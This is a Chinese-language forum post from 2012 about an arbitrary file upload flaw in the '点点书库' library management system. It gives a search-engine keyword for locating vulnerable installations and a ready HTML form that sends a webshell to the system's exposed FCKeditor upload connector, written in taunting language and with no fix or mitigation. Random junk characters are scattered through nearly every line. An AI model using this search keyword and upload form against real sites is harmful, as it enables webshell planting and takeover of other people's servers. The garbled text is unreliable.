主题:图书馆系统任意文件上传漏洞
( I& m. b" j( J9 ` 作者:冰锋刺客
) S" z, G* M0 V+ ^7 R$ J, e8 [( R 厂商:点击书(dianjishu.com)
! x+ q7 g, G. I- ^ S 日期:2012-6-21
3 c# o: j: ?8 U 4 p& R4 H# I* W6 U; o, `1 `# r
I 概述1 W& }/ ~) j1 ~* G1 F
点点书库图书馆系统存在文件上传漏洞,导致可以直接拿webshell
% p5 }% d3 P% K7 y# S II 简介0 ^: N2 |9 C" s; D' n# I
关键词:"Copyright (C) 点点电子书库 2009-2010, All Rights Reserved"
' x8 W* f+ @ s7 [& | 补充一个漏洞: ]7 e1 o, F# T7 Y* e
<form id="frmUpload" enctype="multipart/form-data"
/ S- C* d. r; z" g1 j1 S action="http://url/admin/js/fckeditor/editor/filemanager/connectors/aspx/upload.aspx?Type=Media" method="post">请上传您的马子<br><input type="file" name="NewFile" size="50"><br>
) c! o7 U# O/ G <input id="btnUpload" type="submit" value="操翻他">
/ {0 Z( N7 D, ]! `2 o </form>
8 ?' N! K: B1 X 你们懂的
7 M& N, B$ W# m# N7 B! ?: P 那傻逼提供还需要改包.& S( d6 a5 X: z% ]$ d
自己看了下源代码发现fckeditor
$ Q5 @! z. ^& y; e 直接秒杀$ H+ @8 \( p; m1 |
|
发表于 2012-9-10 21:20:59
收藏
支持
反对